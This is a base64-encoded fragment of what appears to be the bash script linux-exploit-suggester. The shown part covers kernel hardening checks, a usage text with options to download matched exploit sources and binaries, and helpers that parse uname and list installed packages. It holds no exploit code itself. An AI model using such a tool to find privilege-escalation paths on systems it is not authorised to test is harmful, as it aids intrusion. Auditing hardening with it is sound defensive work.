B0cmFjZV9zY29wZS5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogUmVzdHJpY3QgdW5wcml2aWxlZ2VkIGFjY2VzcyB0byBrZXJuZWwgc3lzbG9nCmF2YWlsYWJsZTogQ09ORklHX1NFQ1VSSVRZX0RNRVNHX1JFU1RSSUNUPXksdmVyPj0yLjYuMzcKZW5hYmxlZDogc3lzY3RsOmtlcm5lbC5kbWVzZ19yZXN0cmljdCE9MAphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2RtZXNnX3Jlc3RyaWN0Lm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBSYW5kb21pemUgdGhlIGFkZHJlc3Mgb2YgdGhlIGtlcm5lbCBpbWFnZSAoS0FTTFIpCmF2YWlsYWJsZTogQ09ORklHX1JBTkRPTUlaRV9CQVNFPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9rYXNsci5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogSGFyZGVuZWQgdXNlciBjb3B5IHN1cHBvcnQKYXZhaWxhYmxlOiBDT05GSUdfSEFSREVORURfVVNFUkNPUFk9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2hhcmRlbmVkX3VzZXJjb3B5Lm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBNYWtlIGtlcm5lbCB0ZXh0IGFuZCByb2RhdGEgcmVhZC1vbmx5CmF2YWlsYWJsZTogQ09ORklHX1NUUklDVF9LRVJORUxfUldYPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zdHJpY3Rfa2VybmVsX3J3eC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogU2V0IGxvYWRhYmxlIGtlcm5lbCBtb2R1bGUgZGF0YSBhcyBOWCBhbmQgdGV4dCBhcyBSTwphdmFpbGFibGU6IENPTkZJR19TVFJJQ1RfTU9EVUxFX1JXWD15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc3RyaWN0X21vZHVsZV9yd3gubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEJVRygpIGNvbmRpdGlvbnMgcmVwb3J0aW5nCmF2YWlsYWJsZTogQ09ORklHX0JVRz15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvYnVnLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBBZGRpdGlvbmFsICdjcmVkJyBzdHJ1Y3QgY2hlY2tzCmF2YWlsYWJsZTogQ09ORklHX0RFQlVHX0NSRURFTlRJQUxTPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZWJ1Z19jcmVkZW50aWFscy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogU2FuaXR5IGNoZWNrcyBmb3Igbm90aWZpZXIgY2FsbCBjaGFpbnMKYXZhaWxhYmxlOiBDT05GSUdfREVCVUdfTk9USUZJRVJTPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZWJ1Z19ub3RpZmllcnMubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEV4dGVuZGVkIGNoZWNrcyBmb3IgbGlua2VkLWxpc3RzIHdhbGtpbmcKYXZhaWxhYmxlOiBDT05GSUdfREVCVUdfTElTVD15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvZGVidWdfbGlzdC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogQ2hlY2tzIG9uIHNjYXR0ZXItZ2F0aGVyIHRhYmxlcwphdmFpbGFibGU6IENPTkZJR19ERUJVR19TRz15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvZGVidWdfc2cubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IENoZWNrcyBmb3IgZGF0YSBzdHJ1Y3R1cmUgY29ycnVwdGlvbnMKYXZhaWxhYmxlOiBDT05GSUdfQlVHX09OX0RBVEFfQ09SUlVQVElPTj15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvYnVnX29uX2RhdGFfY29ycnVwdGlvbi5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogQ2hlY2tzIGZvciBhIHN0YWNrIG92ZXJydW4gb24gY2FsbHMgdG8gJ3NjaGVkdWxlJwphdmFpbGFibGU6IENPTkZJR19TQ0hFRF9TVEFDS19FTkRfQ0hFQ0s9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3NjaGVkX3N0YWNrX2VuZF9jaGVjay5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogRnJlZWxpc3Qgb3JkZXIgcmFuZG9taXphdGlvbiBvbiBuZXcgcGFnZXMgY3JlYXRpb24KYXZhaWxhYmxlOiBDT05GSUdfU0xBQl9GUkVFTElTVF9SQU5ET009eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3NsYWJfZnJlZWxpc3RfcmFuZG9tLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBGcmVlbGlzdCBtZXRhZGF0YSBoYXJkZW5pbmcKYXZhaWxhYmxlOiBDT05GSUdfU0xBQl9GUkVFTElTVF9IQVJERU5FRD15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc2xhYl9mcmVlbGlzdF9oYXJkZW5lZC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogQWxsb2NhdG9yIHZhbGlkYXRpb24gY2hlY2tpbmcKYXZhaWxhYmxlOiBDT05GSUdfU0xVQl9ERUJVR19PTj15LGNtZDohIGdyZXAgJ3NsdWJfZGVidWc9LScgL3Byb2MvY21kbGluZQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3NsdWJfZGVidWcubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFZpcnR1YWxseS1tYXBwZWQga2VybmVsIHN0YWNrcyB3aXRoIGd1YXJkIHBhZ2VzCmF2YWlsYWJsZTogQ09ORklHX1ZNQVBfU1RBQ0s9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3ZtYXBfc3RhY2subWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFBhZ2VzIHBvaXNvbmluZyBhZnRlciBmcmVlX3BhZ2VzKCkgY2FsbAphdmFpbGFibGU6IENPTkZJR19QQUdFX1BPSVNPTklORz15CmVuYWJsZWQ6IGNtZDogZ3JlcCAncGFnZV9wb2lzb249MScgL3Byb2MvY21kbGluZQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3BhZ2VfcG9pc29uaW5nLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBVc2luZyAncmVmY291bnRfdCcgaW5zdGVhZCBvZiAnYXRvbWljX3QnCmF2YWlsYWJsZTogQ09ORklHX1JFRkNPVU5UX0ZVTEw9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3JlZmNvdW50X2Z1bGwubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEhhcmRlbmluZyBjb21tb24gc3RyL21lbSBmdW5jdGlvbnMgYWdhaW5zdCBidWZmZXIgb3ZlcmZsb3dzCmF2YWlsYWJsZTogQ09ORklHX0ZPUlRJRllfU09VUkNFPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9mb3J0aWZ5X3NvdXJjZS5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogUmVzdHJpY3QgL2Rldi9tZW0gYWNjZXNzCmF2YWlsYWJsZTogQ09ORklHX1NUUklDVF9ERVZNRU09eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3N0cmljdF9kZXZtZW0ubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFJlc3RyaWN0IEkvTyBhY2Nlc3MgdG8gL2Rldi9tZW0KYXZhaWxhYmxlOiBDT05GSUdfSU9fU1RSSUNUX0RFVk1FTT15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvaW9fc3RyaWN0X2Rldm1lbS5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKc2VjdGlvbjogSGFyZHdhcmUtYmFzZWQgcHJvdGVjdGlvbiBmZWF0dXJlczoKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFN1cGVydmlzb3IgTW9kZSBFeGVjdXRpb24gUHJvdGVjdGlvbiAoU01FUCkgc3VwcG9ydAphdmFpbGFibGU6IHZlcj49My4wCmVuYWJsZWQ6IGNtZDpncmVwIC1xaSBzbWVwIC9wcm9jL2NwdWluZm8KYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zbWVwLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBTdXBlcnZpc29yIE1vZGUgQWNjZXNzIFByZXZlbnRpb24gKFNNQVApIHN1cHBvcnQKYXZhaWxhYmxlOiB2ZXI+PTMuNwplbmFibGVkOiBjbWQ6Z3JlcCAtcWkgc21hcCAvcHJvYy9jcHVpbmZvCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc21hcC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKc2VjdGlvbjogM3JkIHBhcnR5IGtlcm5lbCBwcm90ZWN0aW9uIG1lY2hhbmlzbXM6CkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBHcnNlY3VyaXR5CmF2YWlsYWJsZTogQ09ORklHX0dSS0VSTlNFQz15CmVuYWJsZWQ6IGNtZDp0ZXN0IC1jIC9kZXYvZ3JzZWMKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFBhWAphdmFpbGFibGU6IENPTkZJR19QQVg9eQplbmFibGVkOiBjbWQ6dGVzdCAteCAvc2Jpbi9wYXhjdGwKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IExpbnV4IEtlcm5lbCBSdW50aW1lIEd1YXJkIChMS1JHKSBrZXJuZWwgbW9kdWxlCmVuYWJsZWQ6IGNtZDp0ZXN0IC1kIC9wcm9jL3N5cy9sa3JnCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvbGtyZy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKc2VjdGlvbjogQXR0YWNrIFN1cmZhY2U6CkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBVc2VyIG5hbWVzcGFjZXMgZm9yIHVucHJpdmlsZWdlZCBhY2NvdW50cwphdmFpbGFibGU6IENPTkZJR19VU0VSX05TPXkKZW5hYmxlZDogc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvdXNlcl9ucy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogVW5wcml2aWxlZ2VkIGFjY2VzcyB0byBicGYoKSBzeXN0ZW0gY2FsbAphdmFpbGFibGU6IENPTkZJR19CUEZfU1lTQ0FMTD15CmVuYWJsZWQ6IHN5c2N0bDprZXJuZWwudW5wcml2aWxlZ2VkX2JwZl9kaXNhYmxlZCE9MQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2JwZl9zeXNjYWxsLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBTeXNjYWxscyBmaWx0ZXJpbmcKYXZhaWxhYmxlOiBDT05GSUdfU0VDQ09NUD15CmVuYWJsZWQ6IGNtZDpncmVwIC1pIFNlY2NvbXAgL3Byb2Mvc2VsZi9zdGF0dXMgfCBhd2sgJ3twcmludCBcJDJ9JwphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2JwZl9zeXNjYWxsLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBTdXBwb3J0IGZvciAvZGV2L21lbSBhY2Nlc3MKYXZhaWxhYmxlOiBDT05GSUdfREVWTUVNPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZXZtZW0ubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFN1cHBvcnQgZm9yIC9kZXYva21lbSBhY2Nlc3MKYXZhaWxhYmxlOiBDT05GSUdfREVWS01FTT15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvZGV2a21lbS5tZApFT0YKKQoKCnZlcnNpb24oKSB7CiAgICBlY2hvICJsaW51eC1leHBsb2l0LXN1Z2dlc3RlciAiJFZFUlNJT04iLCBtemV0LCBodHRwczovL3otbGFicy5ldSwgTWFyY2ggMjAxOSIKfQoKdXNhZ2UoKSB7CiAgICBlY2hvICJMRVMgdmVyLiAkVkVSU0lPTiAoaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xpbnV4LWV4cGxvaXQtc3VnZ2VzdGVyKSBieSBAX216ZXRfIgogICAgZWNobwogICAgZWNobyAiVXNhZ2U6IGxpbnV4LWV4cGxvaXQtc3VnZ2VzdGVyLnNoIFtPUFRJT05TXSIKICAgIGVjaG8KICAgIGVjaG8gIiAtViB8IC0tdmVyc2lvbiAgICAgICAgICAgICAgIC0gcHJpbnQgdmVyc2lvbiBvZiB0aGlzIHNjcmlwdCIKICAgIGVjaG8gIiAtaCB8IC0taGVscCAgICAgICAgICAgICAgICAgIC0gcHJpbnQgdGhpcyBoZWxwIgogICAgZWNobyAiIC1rIHwgLS1rZXJuZWwgPHZlcnNpb24+ICAgICAgLSBwcm92aWRlIGtlcm5lbCB2ZXJzaW9uIgogICAgZWNobyAiIC11IHwgLS11bmFtZSA8c3RyaW5nPiAgICAgICAgLSBwcm92aWRlICd1bmFtZSAtYScgc3RyaW5nIgogICAgZWNobyAiIC0tc2tpcC1tb3JlLWNoZWNrcyAgICAgICAgICAgLSBkbyBub3QgcGVyZm9ybSBhZGRpdGlvbmFsIGNoZWNrcyAoa2VybmVsIGNvbmZpZywgc3lzY3RsKSB0byBkZXRlcm1pbmUgaWYgZXhwbG9pdCBpcyBhcHBsaWNhYmxlIgogICAgZWNobyAiIC0tc2tpcC1wa2ctdmVyc2lvbnMgICAgICAgICAgLSBza2lwIGNoZWNraW5nIGZvciBleGFjdCB1c2Vyc3BhY2UgcGFja2FnZSB2ZXJzaW9uIChoZWxwcyB0byBhdm9pZCBmYWxzZSBuZWdhdGl2ZXMpIgogICAgZWNobyAiIC1wIHwgLS1wa2dsaXN0LWZpbGUgPGZpbGU+ICAgLSBwcm92aWRlIGZpbGUgd2l0aCAnZHBrZyAtbCcgb3IgJ3JwbSAtcWEnIGNvbW1hbmQgb3V0cHV0IgogICAgZWNobyAiIC0tY3ZlbGlzdC1maWxlIDxmaWxlPiAgICAgICAgLSBwcm92aWRlIGZpbGUgd2l0aCBMaW51eCBrZXJuZWwgQ1ZFcyBsaXN0IgogICAgZWNobyAiIC0tY2hlY2tzZWMgICAgICAgICAgICAgICAgICAgLSBsaXN0IHNlY3VyaXR5IHJlbGF0ZWQgZmVhdHVyZXMgZm9yIHlvdXIgSFcva2VybmVsIgogICAgZWNobyAiIC1zIHwgLS1mZXRjaC1zb3VyY2VzICAgICAgICAgLSBhdXRvbWF0aWNhbGx5IGRvd25sb2FkcyBzb3VyY2UgZm9yIG1hdGNoZWQgZXhwbG9pdCIKICAgIGVjaG8gIiAtYiB8IC0tZmV0Y2gtYmluYXJpZXMgICAgICAgIC0gYXV0b21hdGljYWxseSBkb3dubG9hZHMgYmluYXJ5IGZvciBtYXRjaGVkIGV4cGxvaXQgaWYgYXZhaWxhYmxlIgogICAgZWNobyAiIC1mIHwgLS1mdWxsICAgICAgICAgICAgICAgICAgLSBzaG93IGZ1bGwgaW5mbyBhYm91dCBtYXRjaGVkIGV4cGxvaXQiCiAgICBlY2hvICIgLWcgfCAtLXNob3J0ICAgICAgICAgICAgICAgICAtIHNob3cgc2hvcnRlbiBpbmZvIGFib3V0IG1hdGNoZWQgZXhwbG9pdCIKICAgIGVjaG8gIiAtLWtlcm5lbHNwYWNlLW9ubHkgICAgICAgICAgIC0gc2hvdyBvbmx5IGtlcm5lbCB2dWxuZXJhYmlsaXRpZXMiCiAgICBlY2hvICIgLS11c2Vyc3BhY2Utb25seSAgICAgICAgICAgICAtIHNob3cgb25seSB1c2Vyc3BhY2UgdnVsbmVyYWJpbGl0aWVzIgogICAgZWNobyAiIC1kIHwgLS1zaG93LWRvcyAgICAgICAgICAgICAgLSBzaG93IGFsc28gRG9TZXMgaW4gcmVzdWx0cyIKfQoKZXhpdFdpdGhFcnJNc2coKSB7CiAgICBlY2hvICIkMSIgMT4mMgogICAgZXhpdCAxCn0KCiMgZXh0cmFjdHMgYWxsIGluZm9ybWF0aW9uIGZyb20gb3V0cHV0IG9mICd1bmFtZSAtYScgY29tbWFuZApwYXJzZVVuYW1lKCkgewogICAgbG9jYWwgdW5hbWU9JDEKCiAgICBLRVJORUw9JChlY2hvICIkdW5hbWUiIHwgYXdrICd7cHJpbnQgJDN9JyB8IGN1dCAtZCAnLScgLWYgMSkKICAgIEtFUk5FTF9BTEw9JChlY2hvICIkdW5hbWUiIHwgYXdrICd7cHJpbnQgJDN9JykKICAgIEFSQ0g9JChlY2hvICIkdW5hbWUiIHwgYXdrICd7cHJpbnQgJChORi0xKX0nKQoKICAgIE9TPSIiCiAgICBlY2hvICIkdW5hbWUiIHwgZ3JlcCAtcSAtaSAnZGViJyAmJiBPUz0iZGViaWFuIgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ3VidW50dScgJiYgT1M9InVidW50dSIKICAgIGVjaG8gIiR1bmFtZSIgfCBncmVwIC1xIC1pICdcLUFSQ0gnICYmIE9TPSJhcmNoIgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ1wtZGVlcGluJyAmJiBPUz0iZGVlcGluIgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ1wtTUFOSkFSTycgJiYgT1M9Im1hbmphcm8iCiAgICBlY2hvICIkdW5hbWUiIHwgZ3JlcCAtcSAtaSAnXC5mYycgJiYgT1M9ImZlZG9yYSIKICAgIGVjaG8gIiR1bmFtZSIgfCBncmVwIC1xIC1pICdcLmVsJyAmJiBPUz0iUkhFTCIKICAgIGVjaG8gIiR1bmFtZSIgfCBncmVwIC1xIC1pICdcLm1nYScgJiYgT1M9Im1hZ2VpYSIKCiAgICAjICd1bmFtZSAtYScgb3V0cHV0IGRvZXNuJ3QgY29udGFpbiBkaXN0cmlidXRpb24gbnVtYmVyIChhdCBsZWFzdCBub3QgaW4gY2FzZSBvZiBhbGwgZGlzdHJvcykKfQoKZ2V0UGtnTGlzdCgpIHsKICAgIGxvY2FsIGRpc3Rybz0kMQogICAgbG9jYWwgcGtnbGlzdF9maWxlPSQyCiAgICAKICAgICMgdGFrZSBwYWNrYWdlIGxpc3RpbmcgZnJvbSBwcm92aWRlZCBmaWxlICYgZGV0ZWN0IGlmIGl0J3MgJ3JwbSAtcWEnIGxpc3Rpbmcgb3IgJ2Rwa2cgLWwnIG9yICdwYWNtYW4gLVEnIGxpc3Rpbmcgb2Ygbm90IHJlY29nbml6ZWQgbGlzdGluZwogICAgaWYgWyAiJG9wdF9wa2dsaXN0X2ZpbGUiID0gInRydWUiIC1hIC1lICIkcGtnbGlzdF9maWxlIiBdOyB0aGVuCgogICAgICAgICMgdWJ1bnR1L2RlYmlhbiBwYWNrYWdlIGxpc3RpbmcgZmlsZQogICAgICAgIGlmIFsgJChoZWFkIC0xICIkcGtnbGlzdF9maWxlIiB8IGdyZXAgJ0Rlc2lyZWQ9VW5rbm93bi9JbnN0YWxsL1JlbW92ZS9QdXJnZS9Ib2xkJykgXTsgdGhlbgogICAgICAgICAgICBQS0dfTElTVD0kKGNhdCAiJHBrZ2xpc3RfZmlsZSIgfCBhd2sgJ3twcmludCAkMiItIiQzfScgfCBzZWQgJ3MvOmFtZDY0Ly9nJykKCiAgICAgICAgICAgIE9TPSJkZWJpYW4iCiAgICAgICAgICAgIFsgIiQoZ3JlcCB1YnVudHUgIiRwa2dsaXN0X2ZpbGUiKSIgXSAmJiBPUz0idWJ1bnR1IgogICAgICAgICMgcmVkaGF0IHBhY2thZ2UgbGlzdGluZyBmaWxlCiAgICAgICAgZWxpZiBbICIkKGdyZXAgLUUgJ1wuZWxbMS05XStbXC5fXScgIiRwa2dsaXN0X2ZpbGUiIHwgaGVhZCAtMSkiIF07IHRoZW4KICAgICAgICAgICAgUEtHX0xJU1Q9JChjYXQgIiRwa2dsaXN0X2ZpbGUiKQogICAgICAgICAgICBPUz0iUkhFTCIKICAgICAgICAjIGZlZG9yYSBwYWNrYWdlIGxpc3RpbmcgZmlsZQogICAgICAgIGVsaWYgWyAiJChncmVwIC1FICdcLmZjWzEtOV0rJ2kgIiRwa2dsaXN0X2ZpbGUiIHwgaGVhZCAtMSkiIF07IHRoZW4KICAgICAgICAgICAgUEtHX0xJU1Q9JChjYXQgIiRwa2dsaXN0X2ZpbGUiKQogICAgICAgICAgICBPUz0iZmVkb3JhIgogICAgICAgICMgbWFnZWlhIHBhY2thZ2UgbGlzdGluZyBmaWxlCiAgICAgICAgZWxpZiBbICIkKGdyZXAgLUUgJ1wubWdhWzEtOV0rJyAiJHBrZ2xpc3RfZmlsZSIgfCBoZWFkIC0xKSIgXTsgdGhlbgogICAgICAgICAgICBQS0dfTElTVD0kKGNhdCAiJHBrZ2xpc3RfZmlsZSIpCiAgICAgICAgICAgIE9TPSJtYWdlaWEiCiAgICAgICAgIyBwYWNtYW4gcGFja2FnZSBsaXN0aW5nIGZpbGUKICAgICAgICBlbGlmIFsgIiQoZ3JlcCAtRSAnXCBbMC05XStcLicgIiRwa2dsaXN0X2ZpbGUiIHwgaGVhZCAtMSkiIF07IHRoZW4KICAgICAgICAgICAgUEtHX0xJU1Q9JChjYXQgIiRwa2dsaXN0X2ZpbGUiIHwgYXdrICd7cHJpbnQgJDEiLSIkMn0nKQogICAgICAgICAgICBPUz0iYXJjaCIKICAgICAgICAjIGZpbGUgbm90IHJlY29nbml6ZWQgLSBza2lwcGluZwogICAgICAgIGVsc2UKICAgICAgICAgICAgUEtHX0xJU1Q9IiIKICAgICAgICBmaQoKICAgIGVsaWYgWyAiJGRpc3RybyIgPSAiZGViaWFuIiAtbyAiJGRpc3RybyIgPSAidWJ1bnR1IiAtbyAiJGRpc3RybyIgPSAiZGVlcGluIiBdOyB0aGVuCiAgICAgICAgUEtHX0xJU1Q9JChkcGtnIC1sIHwgYXdrICd7cHJpbnQgJDIiLSIkM30nIHwgc2VkICdzLzphbWQ2NC8vZycpCiAgICBlbGlmIFsgIiRkaXN0cm8iID0gIlJIRUwiIC1vICIkZGlzdHJvIiA9ICJmZWRvcmEiIC1vICIkZGlzdHJvIiA9ICJtYWdlaWEiIF07IHRoZW4KICAgICAgICBQS0dfTElTVD0kKHJwbSAtcWEpCiAgICBlbGlmIFsgIiRkaXN0cm8iID0gImFyY2giIC1vICIkZGlzdHJvIiA9ICJtYW5qYXJvIiBdOyB0aGVuCiAgICAgICAgUEtHX0xJU1Q9JChwYWNtYW4gLVEgfCBhd2sgJ3twcmludCAkMSItIiQyfScpCiAgICBlbGlmIFsgLXggL3Vzci9iaW4vZXF1ZXJ5IF07IHRoZW4KICAgICAgICBQS0dfTElTVD0kKC91c3IvYmluL2VxdWVyeSAtLXF1aWV0IGxpc3QgJyonIC1GICckbmFtZTokdmVyc2lvbicgfCBjdXQgLWQvIC1mMi0gfCBhd2sgJ3twcmludCAkMSI6IiQyfScpCiAgICBlbHNlCiAgICAgICAgIyBwYWNrYWdlcyBsaXN0aW5nIG5vdCBhdmFpbGFibGUKICAgICAgICBQS0dfTElTVD0iIgogICAgZmkKfQoKIyBmcm9tOiBodHRwczovL3N0YWNrb3ZlcmZsb3cuY29tL3F1ZXN0aW9ucy80MDIzODMwL2hvdy1jb21wYXJlLXR3by1zdHJpbmdzLWluLWRvdC1zZXBhcmF0ZWQtdmVyc2lvbi1mb3JtYXQtaW4tYmFzaAp2ZXJDb21wYXJpc2lvbigpIHsKCiAgICBpZiBbWyAkMSA9PSAkMiBdXQogICAgdGhlbgogICAgICAgIHJldHVybiAwCiAgICBmaQoKICAgIGxvY2FsIElGUz0uCiAgICBsb2NhbCBpIHZlcjE9KCQxKSB2ZXIyPSgkMikKCiAgICAjIGZpbGwgZW1wdHkgZmllbGRzIGluIHZlcjEgd2l0aCB6ZXJvcwogICAgZm9yICgoaT0keyN2ZXIxW0BdfTsgaTwkeyN2ZXIyW0BdfTsgaSsrKSkKICAgIGRvCiAgICAgICAgdmVyMVtpXT0wCiAgICBkb25lCgogICAgZm9yICgoaT0wOyBpPCR7I3ZlcjFbQF19OyBpKyspKQogICAgZG8KICAgICAgICBpZiBbWyAteiAke3ZlcjJbaV19IF1dCiAgICAgICAgdGhlbgogICAgICAgICAgICAjIGZpbGwgZW1wdHkgZmllbGRzIGluIHZlcjIgd2l0aCB6ZXJvcwogICAgICAgICAgICB2ZXIyW2ldPTAKICAgICAgICBmaQogICAgICAgIGlmICgoMTAjJHt